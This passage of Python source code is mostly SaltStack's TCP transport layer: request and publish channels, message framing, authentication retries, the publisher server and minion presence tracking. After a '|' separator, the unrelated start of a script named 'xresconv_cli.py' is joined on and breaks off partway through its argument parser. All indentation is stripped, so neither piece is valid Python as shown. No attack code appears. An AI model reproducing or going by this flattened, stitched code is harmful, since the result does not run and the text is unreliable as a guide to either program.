data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
try:
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError('Connection to master lost')
raise tornado.gen.Return(ret)
class AsyncTCPPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.event = salt.utils.event.get_event(
'minion',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
def __del__(self):
self.close()
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def send_id(self, tok, force_auth):
'''
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
'''
load = {'id': self.opts['id'], 'tok': tok}
@tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while count <= self.opts['tcp_authentication_retries'] or self.opts['tcp_authentication_retries'] < 0:
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event(
{'master': self.opts['master']},
'__master_connected'
)
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get('__role') == 'syndic':
data = 'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'syndic'
)
else:
data = 'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'minion'
)
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': None,
'tok': self.tok,
'data': data,
'tag': tag}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel, (self.opts,)
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event(
{'master': self.opts['master']},
'__master_disconnected'
)
@tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b'salt')
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts['master_ip'], int(self.auth.creds['publish_port']),),
kwargs={'io_loop': self.io_loop,
'connect_callback': self.connect_callback,
'disconnect_callback': self.disconnect_callback,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_publish_port')})
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt:
raise
except Exception as exc:
if '-|RETRY|-' not in six.text_type(exc):
raise SaltClientError('Unable to sign_in to master: {0}'.format(exc)) # TODO: better error message
def on_recv(self, callback):
'''
Register an on_recv callback
'''
if callback is None:
return self.message_client.on_recv(callback)
@tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = msgpack.loads(body)
if six.PY3:
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise exc
self._socket.close()
self._socket = None
def __del__(self):
self.close()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(self.socket_queue,
self.handle_message,
ssl_options=self.opts.get('ssl'))
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self.req_server = SaltMessageServer(self.handle_message,
ssl_options=self.opts.get('ssl'))
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
@tornado.gen.coroutine
def handle_message(self, stream, header, payload):
'''
Handle incoming messages from underylying tcp streams
'''
try:
try:
payload = self._decode_payload(payload)
except Exception:
stream.write(salt.transport.frame.frame_msg('bad load', header=header))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
yield stream.write(salt.transport.frame.frame_msg(
'payload and load must be a dict', header=header))
raise tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if '\0' in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
yield stream.write(salt.transport.frame.frame_msg(
self._auth(payload['load']), header=header))
raise tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.write('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
stream.close()
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == 'send':
stream.write(salt.transport.frame.frame_msg(self.crypticle.dumps(ret), header=header))
elif req_fun == 'send_private':
stream.write(salt.transport.frame.frame_msg(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
), header=header))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.write('Server-side exception handling payload')
stream.close()
except tornado.gen.Return:
raise
except tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error('Connection was unexpectedly closed', exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error('Unexpected exception occurred: %s', exc, exc_info=True)
raise tornado.gen.Return()
class SaltMessageServer(tornado.tcpserver.TCPServer, object):
'''
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
'''
def __init__(self, message_handler, *args, **kwargs):
super(SaltMessageServer, self).__init__(*args, **kwargs)
self.io_loop = tornado.ioloop.IOLoop.current()
self.clients = []
self.message_handler = message_handler
@tornado.gen.coroutine
def handle_stream(self, stream, address):
'''
Handle incoming streams and add messages to the incoming queue
'''
log.trace('Req client %s connected', address)
self.clients.append((stream, address))
unpacker = msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
self.io_loop.spawn_callback(self.message_handler, stream, header, framed_msg['body'])
except tornado.iostream.StreamClosedError:
log.trace('req client disconnected %s', address)
self.clients.remove((stream, address))
except Exception as e:
log.trace('other master-side exception: %s', e)
self.clients.remove((stream, address))
stream.close()
def shutdown(self):
'''
Shutdown the whole server
'''
for item in self.clients:
client, address = item
client.close()
self.clients.remove(item)
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
'''
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
'''
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super(LoadBalancerWorker, self).__init__(
message_handler, *args, **kwargs)
self.socket_queue = socket_queue
t = threading.Thread(target=self.socket_queue_thread)
t.start()
def socket_queue_thread(self):
try:
while True:
client_socket, address = self.socket_queue.get(True, None)
# 'self.io_loop' initialized in super class
# 'tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(tornado.tcpclient.TCPClient):
'''
Override _create_stream() in TCPClient to enable keep alive support.
'''
def __init__(self, opts, resolver=None):
self.opts = opts
super(TCPClientKeepAlive, self).__init__(resolver=resolver)
def _create_stream(self, max_buffer_size, af, addr, **kwargs): # pylint: disable=unused-argument
'''
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
'''
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = tornado.iostream.IOStream(
sock,
max_buffer_size=max_buffer_size)
if tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(SaltMessageClientPool, self).__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
def __del__(self):
self.close()
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
for future in futures:
yield future
raise tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient(object):
'''
Low-level message sending client
'''
def __init__(self, opts, host, port, io_loop=None, resolver=None,
connect_callback=None, disconnect_callback=None,
source_ip=None, source_port=None):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, '_stream') and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
if (not self._stream_return_future.done() and
self.io_loop != tornado.ioloop.IOLoop.current(
instance=False)):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self.io_loop.stop()
)
self.io_loop.start()
finally:
orig_loop.make_current()
self._tcp_client.close()
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
def __del__(self):
self.close()
def connect(self):
'''
Ask for this client to reconnect to the origin
'''
if hasattr(self, '_connecting_future') and not self._connecting_future.done():
future = self._connecting_future
else:
future = tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@tornado.gen.coroutine
def _connect(self):
'''
Try to connect for the rest of time!
'''
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {'source_ip': self.source_ip,
'source_port': self.source_port}
else:
log.warning('If you need a certain source IP/port, consider upgrading Tornado >= 4.5')
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(self.host,
self.port,
ssl_options=self.opts.get('ssl'),
**kwargs)
self._connecting_future.set_result(True)
break
except Exception as e:
yield tornado.gen.sleep(1) # TODO: backoff
#self._connecting_future.set_exception(e)
@tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done() or
self._connecting_future.result() is not True):
yield self._connecting_future
unpacker = msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(4096, partial=True)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
body = framed_msg['body']
message_id = header.get('mid')
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error('Got response for message_id %s that we are not tracking', message_id)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s:%s closed, unable to recv', self.host, self.port)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if 'detect_mode' in self.opts:
log.info('There was an error trying to use TCP transport; '
'attempting to fallback to another transport')
else:
raise SaltClientError
except Exception as e:
log.error('Exception parsing response', exc_info=True)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@tornado.gen.coroutine
def _stream_send(self):
while not self._connecting_future.done() or self._connecting_future.result() is not True:
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception('Unable to find available messageid')
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
'''
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(
SaltReqTimeoutError('Message timed out')
)
def send(self, msg, timeout=None, callback=None, raw=False):
'''
Send given message, and return a future
'''
message_id = self._message_id()
header = {'mid': message_id}
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message_id)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append((message_id, salt.transport.frame.frame_msg(msg, header=header)))
return future
class Subscriber(object):
'''
Client object for use with the TCP publisher server
'''
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exc_info()
def __del__(self):
self.close()
class PubServer(tornado.tcpserver.TCPServer, object):
'''
TCP publisher
'''
def __init__(self, opts, io_loop=None):
super(PubServer, self).__init__(ssl_options=opts.get('ssl'))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
'master',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
def __del__(self):
self.close()
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = set([client])
if self.presence_events:
data = {'new': [id_],
'lost': []}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {'new': [],
'lost': [id_]}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
@tornado.gen.coroutine
def _stream_read(self, client):
unpacker = msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
body = framed_msg['body']
if body['enc'] != 'aes':
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
load = crypticle.loads(body['load'])
if six.PY3:
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load['id'], load['tok']):
continue
client.id_ = load['id']
self._add_client_present(client)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s closed, unable to recv', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e:
log.error('Exception parsing response', exc_info=True)
continue
def handle_stream(self, stream, address):
log.trace('Subscriber at %s connected', address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug('TCP PubServer sending payload: %s', package)
payload = salt.transport.frame.frame_msg(package['payload'])
to_remove = []
if 'topic_lst' in package:
topic_lst = package['topic_lst']
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug('Publish target %s not connected', topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug('Subscriber at %s has disconnected from publisher', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace('TCP PubServer finished publishing payload')
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state['secrets']
self.__init__(state['opts'])
def __getstate__(self):
return {'opts': self.opts,
'secrets': salt.master.SMaster.secrets}
def _publish_daemon(self, log_queue=None):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts['interface'], int(self.opts['publish_port'])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=self.io_loop,
payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
old_umask = os.umask(0o177)
try:
pull_sock.start()
finally:
os.umask(old_umask)
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
'''
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue()
)
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
'''
Publish "load" to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Use the Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
# TODO: switch to the actual asynchronous interface
#pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,)
)
pub_sock.connect()
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
if isinstance(load['tgt'], six.string_types):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload['topic_lst'] = match_ids
else:
int_payload['topic_lst'] = load['tgt']
# Send it over IPC!
pub_sock.send(int_payload)
|
xresconv_cli.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
# ==================================================================================
import threading
import xml.etree.ElementTree as ET
from multiprocessing import cpu_count
from argparse import ArgumentParser
from subprocess import PIPE, Popen
from print_color import cprintf_stderr, cprintf_stdout, print_style
exit_code = 0
def main():
console_encoding = sys.getfilesystemencoding()
java_encoding = "utf-8"
if 2 == sys.version_info[0] and "utf-8" != sys.getdefaultencoding().lower():
try:
sys.setdefaultencoding("utf-8")
except LookupError:
reload(sys)
sys.setdefaultencoding("utf-8")
xconv_split_by_spaces = re.compile("\\s+", re.IGNORECASE)
xconv_options = {
"version": "1.3.1",
"conv_list": None,
"real_run": True,
"args": {},
"ext_args_l1": [],
"ext_args_l2": [],
"work_dir": ".",
"xresloader_path": "xresloader.jar",
"item": [],
"parallelism": int((cpu_count() - 1) / 2) + 1,
"java_options": [],
"default_scheme": {},
"data_version": None,
"output_matrix": {"file_path": None, "outputs": []},
}
# 默认双线程,实际测试过程中java的运行优化反而比多线程更能提升效率
if xconv_options["parallelism"] > 2:
xconv_options["parallelism"] = 2
xconv_xml_global_nodes = []
xconv_xml_list_item_nodes = []
usage = "%(prog)s [options...] <convert list file> [-- [xresloader options...]]"
parser = ArgumentParser(usage=usage)
parser.add_argument(
"-v",
"--version",
action="store_true",
help="show version and exit",
dest="version",
default=False,
)
parser.add_argument(
"-s",
"--scheme-name",
action="append",
help="only convert schemes with name <scheme name>",
metavar="<scheme>",
dest="rule_schemes",
default=[],
)
parser.add_argument(
"-t",
"--test",
action="store_true",
help="test run and show cmds",
dest="test",
default=False,
)
parser.add_argument(
"-p",
"--parallelism",
action="store",
help="set parallelism task number(default:"
+ str(xconv_options["parallelism"])
+ ")",
metavar="<number>",
dest="parallelism",
type=int,
default=xconv_options["parallelism"],
)
parser.add_argument(
"-j",
"--java-option",
action="append",
help="add java options to command(example: Xmx=2048m)",
metavar="<java option>",
